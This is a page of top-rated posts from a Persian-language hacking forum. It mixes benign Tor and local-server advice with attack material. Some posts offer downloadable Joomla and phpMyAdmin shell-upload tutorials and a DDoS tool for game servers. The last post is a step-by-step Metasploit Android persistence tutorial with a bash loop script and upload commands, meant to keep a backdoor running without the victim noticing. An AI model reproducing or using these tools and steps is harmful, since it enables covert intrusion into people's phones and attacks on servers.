پرچمداران


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در ۱۸/۰۷/۱۲ در همه بخش ها

  1. 5 امتیاز
    سلام. نمیشه گفت دقیقا به چه روشی سایت هارو میزنن.هر کس شیوه و روش خاص خودش رو داره.بعضی ها با باگ sqli میزنن و بعضی هم با بایپس آپلودر د هزاران راه و روش دیگه دیگه وجود داره. گاهی اوقات هم موقعی که از سرور دسترسی میگیرن سایت ها روی سرور هستن و میزنن. پس دقیقا روش خاصی وجود نداره هر کس از یک روش و باگ استفاده میکنه. موفق باشید
  2. 3 امتیاز
    سلام دوست عزیز اول تشکر می کنم بابت پاسخ خوب دوستان گفتید تور جواب نداد؟! چرا؟ میشه گفت اکثر کسایی که با گنو / لینوکس کار می کنند حالا هر نسخه ای دارن از همین مرورگر تور استفاده می کنند. چون همه قابل اعتماد و هم سرعت خوبی و داره و حتی زبان پارسی رو پوشش میده و صد البته فراموش نکنیم تور مختصر به گنو / لینوکس نیست و ویندوز و مک و اندروید رو نیز پوشش میده. یکی از روش های نصبش رو اقای saman90 قرار دادن. روش نصب دیگش ورود به سایت تور و دانلود فایل با توجه به نسخه مورد نظرتون هست. از اونجایی که خود سایت تور نیز ما رو تحریم کرده می تونید نسخه سیستم عاملتون رو (۶۴- ۳۲) بگید تا فایل نصبیش رو از سایت رسمی گرفته و داخل سایت قرار بدم. پیشنهاد من استفاده از مرورگر تور هست و حالا اگر از شبکه اجتماعی خاصی هم می خواید استفاده کنید میتونید از نسخه وب داخل تور استفاده کنید. اصلی ترین علت اسرار من از مرورگر تور این میتونه باشه که امنیت شما رو تا حد زیادی میتونه پوشش بده. باز اگر مشکلی در نصبش دارید می تونید در میون بزارید که دوستان راهنمایی کنند. این اطلاعات و نظر بنده بود . اگر دوستان چیز مناسب تری به ذهنشون میرسه خواهشا مطرح کنند که هممون بتونیم نهایت استفاده رو ببریم. سپاس و یا علی
  3. 2 امتیاز
    به طور کلی هنگامی که ما میخواهیم یک متن خاص را جستجو کنیم، مرورگر مورد علاقه خود را باز می کنیم، به موتور جستجوی وب می رویم و برخی از کلمات مربوط به آن را تایپ می کنیم. بسته به اینکه چگونه جستجو را انجام می دهیم، نتایج بیشتری را به دست می آوریم با جستجوگرها کارهای خیلی مفیدی میتوان انجام داد و خیلی زیاد مطلب اموزشی میتوان قرار داد. در این متن نسبتا کوتاه قست دارم از کاربرد جستوگرها برای نفوذگرها و نحوه ی استفاده آنها برای گرفتن اطلاعات مورد نیاز مطالبی رو خدمت شما کاربران گاردایران ارایه دهم , وقتی که صحبت از جستجوگر و نفوذ کنار هم میان ذهن اکثر شما عزیزان به سمت Google Hacking و استفاده از Dork ها جهت شناسایی اسیب پذیریها میرود, اما همه جیز در اینجا خلاصه نمیشود. بعد از توضیحاتی کوتاه راجع به جستجوگرها چند جستجوگر که بسیار زیاد برای نفوذگرها قابل اهمیت و پرکاربرد هستند را معرفی خواهم کرد .جستجوگرها بر این اساس دسته بندی میشوند : Crawler based search engines Human powered directories Hybrid search engines Other special search engines Crawler based search engines همه موتورهای جستجوی مبتنی بر خزنده از یک خزنده عنکبوت برای خزیدن و نمایه سازی محتوای جدید به پایگاه داده جستجو استفاده می کنند, هر موتور جستجوگر مبتنی بر خزنده 4 مرحله را برای جستجو دنبال میکنند. Crawling Indexing Calculating Relevancy Retrieving the Result واژه Crawling رو شما در تمام ابزارهای تست نفوذ و اسکنر های وب مشاهده کردید , spider تمام محتوای تک تک پیج ها و لینک های درون صفحات را شناسایی میکند و فهرست میکند سپس کاربران از میان این اطلاعات ذخیره شده، آنچه را که می‌خواهند جستجو می‌کنند. اگر شما در صفحه وب خود تغییراتی را اعمال نمایید، موتورهای جستجوی پیمایشی آنها را به طور خودکار می‌یابند و سپس این تغییرات در فهرست ها اعمال میکنند. Human powered directories این نوع وابسته به کاربرانی است که آن را تکمیل می‌کنند, کاربر صفحه مورد نظر را به همراه توضیحی کوتاه در فهرست ثبت می‌کند یا این کار توسط ویراستارهایی که برای آن فهرست در نظر گرفته شده، انجام می‌شود. عمل جستجو در این حالت تنها بر روی توضیحات ثبت شده صورت می‌گیرد و در صورت تغییر روی صفحه وب، روی فهرست تغییری به وجود نخواهد آورد. Hybrid search engines موتورهای جستجو ترکیبی از هر دو فهرست خزنده و دستی برای فهرست سایت ها در نتایج جستجو استفاده می کنند. بیشتر موتورهای جستجوگر مبتنی بر خزنده مانند گوگل اساسا از خزنده ها به عنوان مکانیسم اولیه و Human powered به عنوان مکانیسم ثانویه استفاده می کنند, موتورهای جستجو بیشتر این روزها به یک مدل مبتنی بر ترکیبی حرکت می کنند. خیلی کوتاه توضیح دادم توضیحات جامع تری در این باره در فضای مجازی مطالعه کنید. 5 جستجوگر مطرح مخصوص هکرها : #1 SHODAN #2 censys #3 ZOOMEYE #4 IVRE #5 PUNKSPIDER به زودی آموزش های تصویری استفاده از این جستجوگرها در انجمن قرار خواهد گرفت با ما همراه باشید. امیدوارم این مقاله مفید واقع شده باشد. موفق و سربلند باشید . تیم امنیتی گارد ایران.
  4. 1 امتیاز
    Mr.Python

    مشکل کرک vps

    نمیدونم چیزی که میخوام بگم راه حلی هست برا این مشکل یا نه یا اصلا قبلا امتحان کردین یه سرچی انجام دادم تو گوگل که چند تا سایت بودن درباره این ارور نوشته بودن متن این ارور که واضحه داره چی میگه اما تو سایت نوشته :"شما این پیغام رو مشاهده میکنید چون اکانت کاربری که شما دارید ازش برای ورود استفاده میکنید ، مجوز های صحیحی برای استفاده از Remote desktop را ندارد . برای برطرف کردن این مشکل این مجوز هارو به اکانتتون میدیم . " که طبق مراحلی که داخل سایت وجود داره باید اون کار هارو انجام بدید . https://support.jumpdesktop.com/hc/en-us/articles/216424183-General-RDP-You-must-be-granted-the-Allow-log-on-through-the-Terminal-or-Remote-Desktop-Services-Right- جواب نداد ، پیگیر باشید تو سایتای خارجی . ضمنا سوالتون تو جای درست پرسیده نشده قبل از هر چیز تو انجمن یه گشتی بزنید.
  5. 1 امتیاز
    تا جایی که اطلاع دارم ، با لینک امکانش نیست .
  6. 1 امتیاز
    سلام خدمت دوستان عزیز گارد ایران. خوب دوستان اینم یک آموزش مفید و بسیار کاربردی برای دوستان. pass:guardiran.org برای استفاده از آموزش ابتدا تمامی فایل ها رو دانلود و در یک پوشه اکسترکت نمایید. یا حق Jomla Shell Upload Full Privet 8.part1.rar Jomla Shell Upload Full Privet 8.part2.rar
  7. 1 امتیاز
    سلام خدمت دوستان عزیز گارد ایران.براتون دیداسری قدرتمند در زمینه حملات تکذیب سرویس به گیم سرور ها آماده کردم.این ابزار واقعا کاربردیه و امیدوارم از این ابزار لذت ببرین.با تشکر Pass:guardiran.org ATTACKER (1).rar
  8. 1 امتیاز
    0r0b4s

    phpmyadmin

    با سلام اگه دیر شد ببخشید ساده ترین روش هس این باز اکه نتونستی بگو در اولین فرصت کامل کامل بگم چطور هس Upload a shell via PhpMyAdmin.rar
  9. 1 امتیاز
    درود ../ دوست عزیز اگه به تاریخ تاپیک توجه کنید ، متوجه خواهید شد که ایشون تا الان قطعا فوت کردند :|♥ لطفا تاپیک قدیمی بالا نیارید ! میتونستید این سوال رو از طریق پیام خصوصی ارسال کنید ! یا حـ ـق ../
  10. 1 امتیاز
    0r0b4s

    phpmyadmin

    با سلام دوست عزیز در این رابطه من اموزشی تویب انجمن قرار داده بودم اما نتونستم پیدا کنم در اولین فرصت دوباره اپلود میکنم
  11. 1 امتیاز
    سلام دوست عزیز tor browserرو با یه دستور ساده میشه نصب کرد. $ sudo apt install torbrowser-launcher بعد نصب تو لانچر بزنی tor دو تا گزینه میاره tor browser رو انتخاب کن ... اولین بار یه مقدار طول میکشه تا بالا بیاد.صبر کن. این مزیتش به انه که خودش browser داره ... اما ضعفش اینه که تو ترمینال بهت این دسترسی رو نمیده. موفق باشی.
  12. 1 امتیاز
    بسم الله الرحمان الرحیم بار ها شاهد این بودم که همه ی اعضای انجمن بدون اینکه قوانین انجمن رو مطالعه کنن شروع به پست دادن میکنن و قوانین رو زیر پا میزارن :اینرو گذاشتن به حساب این که تازه به جمع ما اضافه شدید و هنوز با حال و هوای انجمن اشنا نیستید!!! من در این تاپیک چند مورد از مواردی که خیلی زیر پا گزاشته شده رو توضیح میدم و امید وارم که همه از اونها پیروی کنند. 1_ اولین موردی که خیلی هم مشاهده میشه این هست که بی مورد در پست اموزی اسپم میدید...عزیز من وتی توی یک پست اموزشی پست ارسال میکنید در واقع اسپم ارسال کردید حالا مهم نیست که اون پست سوال بود یا تشکر !!!! برا تشکر کافیه گزینه ی پسندیدم رو در پایین سمت چپ موضوع ارسالی کلیک کنید.اگر سوالی دارید در بخش سوال ها و جواب های انجمن سوال خودتون رو بپرسید و لینک مربوط به اون تاپیک رو هم در پایین توضیحات خودتون پیوست کنید همین!!! (اگر مشاهده شد اول اخطار داده میشه و بعد هم پست به سطل زباله انجمن انتقال داده میشه!!!) 2 _ دومین موضوعی که خیلی بین کاربران مشاهده این بود که در ارسال موضوع به انجمن از برچسب های مربوطه استفاده نکردید!!! اولین برچست شما باید عنوان پست باشه و بقیه ی اونها هم مربوط به موضوع باشه!!!شما حتما باید از 10 برچسب خوب استفاده کنید تا به راحتی توسط بقیه ی کاربران قابل یافتن باشه... (در صورت مشاهده اول اخطار داده میشه و در صورت اصلاح نشدن پست به سطل زباله انجمن انتقال داده میشه!!!) 3 _ سومین مورد هم این هست که بدون این که تو انجمن بگردید شروع میکنید به ارسال پست و یا سوال کردن در مورد فلان برنامه و چگونگی رفع ارور برنامه ی ایکس:عزیز من شما یکم بگرد تو انجمن اگر نبود بعد شروع کنید به سوال کردن من حداقل به هر سوالی که تو ذهنتون هست 3 بار جواب دادم بقیه ی مدیران که جای خود دارن!!! (در صورت مشاهده اول به پست جواب میدیم و اونرو انتقال میدیم ولی در صورت تکرار بیشتر از 4 بار اول اخطار داده میشه و بعد هم یوزر رو بن میکنیم!!!) و پسورد تمامی فایل های انجمن هم guardiran.org هست و باید موقع ارسال پست این موضوع رو رعایت کنید!!!! این چند مورد رو خیلی زیاد دیدم که مستلزم یاداوری برای تمامی اعضای انجمن بود: امیدوارم که همه ی اعضا رعایت کنند قوانین انجمن هم توی امظای من در پایین همین پست میتونید پیدا کنید (روی اون کلیک کنید و اونرو به صورت مفصل مطالعه کنید) سوالی بود اونرو به صورت پیام خصوصی به من ارسال کنید (برای ارسال پیام خصوصی هم کافیه هست که روی عکس پروفایل فرد مورد نظرتون کلیک کنید و در پروفایل اون روی گزینه ی پیام کلیک کنید و متن خودتون رو تایپ و ارسال کنید ) با تشکر از تمامی کسانی که به قوانین انجمن احترام میزارن
  13. 1 امتیاز
    سلام درود xamp هم نصب کنی مثل همین wamp کار میکنه اما به نظر من xamp بهتره وقتی xamp رو نصب کردی تو پوشه htdocs فایل php رو قرار بده و ازتو مرورگر به ادرس localhost/lol.php رو اجرا کن
  14. 1 امتیاز
    درود wamp server رو دانلود و نصب کنید. سپس به مسیر زیر برید و تمام فایل هارو به جز index.php پاک کنید. محتویات فایل LoL.php رو در index.php جایگذاری کنید و ذخیر کنید.مرورگرتون رو باز کنید و localhost رو تایپ کنید. سپس بقیه مراحل رو انجام بدین و... یا علی
  15. 1 امتیاز
    سلام در این اموزش که از سایت nullbyet گرفته شده به شما یاد میدیم که بعد اینکه با متااسپلویت از سیستم هدف دسترسی گرفتید چطپر دسترسی رو دائمی کنید . ابتدا یک فایل با نام دلخواه ( مثال : bd ) در کالی خود با فرمت sh بسازید برای اینکار میتونید اینطور اقدام کنید : ( در ترمینال) touch bd.sh فایل رو با یک ویرایشگر باز کنید و کد زیر رو کپی پیست کنید داخل اون: #!/bin/bash while true do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 20 done توضیحات اسکریپت: در خط اول اسکریپت ما با shebang مفسر زبان bash رو برای اجرای اینکار فراخوانی میکنیم . در خط دوم تگ activity در مانفیست فایل اندروید که مربوط به اجرای برنامه اندرویدی هست رو فراخوانده و با پارامتر n- ابتدا وارد پکیج برنامه شده و دستور اجرای فایل smali mainactivity رو برای اجرا شدن دوباره برنامه تایپ میکنیم . در sleep مقدار تاخیری که بک دور تلاش میکنه دوباره به ما وصل بشه رو تعیین میکنیم (به ثانیه) در اخر اسکریپت رو با نوشتن done میبندیم(منظور : اسکریپت دیگه ادامه نداره ) خب حالا اول دستور pwd رو وارد کنید که ببینید پروسه حملتون در کجای سیستم طرف قرار داره که اگر بایند نکرده باشین این شکلیه : data/data/com.metasploit.stage/files/ این رو کپی پیست کنید ( Ctrl + shift + c) حالا با دستور upload فایل بک دور رو به این مسیر انتقال بدید : upload /root/be.sh /data/data/com.metasploit.stage/files خب وقتی اپلود شد دستور shell رو بزنید تا وارد شل اندروید بشید و بعد دستور زیر رو بزنید تا به مسیر پروسه وارد بشید : cd /data/data/com.metasploit.stage/files حالا بک درو رو اجرا میکنیم ، دستور زیر رو تایپ کنید در همان پوسته shell sh bd.sh خب حالا بسته به مدت زمانی که در قسمت sleep اسکریپت دادید برنامه به طور خودکار هی باز میشه (شخص نمیفهمه) حالا با زدن Ctrl + c ، یک سوال میپرسه که نوشته کانال شل بسته بشه شما y رو تایپ کنید و اینتر رو بزنید تا پوسته shell بسته بشه و به meterpreter بر گردید . ضمنا با اینکار شما بک دور رو از کار نمیندازید و بک دور خودش همیشه در حال اجراست مگر اینکه کلا بخواید نفوذ رو قطع کنید. شما میتونید این مراحل رو در مسیر دیگه انجام بدید و لزوما در اون مسیری که من گفتم نیازی نیست اینکارو انجام بدید و اما به نظرم بهتره بک دور در همین مسیر باشه . اگر بایند کردین که در pm بپرسید بگم باید چیکار کنید ( فقط یه دستکاری تو اسکریپت میخواد که اینم در نظر داشته باشید بک دور برای برنامه های بایند شده ، کلا اون برنامه ای که با تروجان قاطی کردین رو مرتب اجرا میکنه! طرف فکر میکنه گوشیش خرابه که هی برنامه اجرا میشه !!) موفق باشید .